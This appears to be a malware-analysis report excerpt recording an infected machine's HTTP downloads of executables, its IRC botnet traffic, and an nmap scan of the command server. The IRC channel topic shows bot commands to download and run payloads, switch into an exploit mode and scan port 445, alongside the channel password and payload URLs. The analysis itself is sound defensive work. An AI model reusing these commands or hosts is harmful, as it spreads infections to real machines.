– HTTP Conversations:
74.52.56.243:80 – [www.viajejapon.com]
Request: GET /…/sp2eng.txt
Response: 200 “OK”
Request: GET /…/LiveProfile.exe
Response: 200 “OK”
Request: GET /…/gatex.exe
Response: 200 “OK”
72.233.89.198:80 – [whatismyip.com]
Request: GET /automation/n09230945.asp
Response: 200 “OK”
– IRC Conversations:
58.251.59.9:31091
Nick: user|46
Username: user|46
Joined Channel: #simple# with Password syslock
Channel Topic for Channel #simple#: “! usboff;! killoldones;! dlx www.viajejapon.com/…/gatex.exe;! start liveprofile.exe;! dlx www.viajejapon.com/…/LiveProfile.exe;! exploitmode1;! dl www.viajejapon.com/…/sp2eng.txt;! payload sp2eng.txt;! scanmyrange 445 10”
Interesting ports on reverse.gdsz.cncnet.net (58.251.59.9):
Not shown: 1656 closed ports
PORT STATE SERVICE VERSION
15/tcp open netstat
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.2 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
389/tcp open ldap OpenLDAP 2.2.X
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
631/tcp open tcpwrapped
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1521/tcp open oracle-tns Oracle TNS Listener
1720/tcp filtered H.323/Q.931
5001/tcp open apc-agent APC PowerChute agent
5060/tcp filtered sip
5520/tcp open sdlog Oracle Enterprise Manager
5560/tcp open http Oracle Application Server httpd 9.0.4.1.0
5800/tcp filtered vnc-http
6347/tcp open oracle-tns Oracle TNS Listener
6667/tcp open irc ircu ircd
8009/tcp open ajp13?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1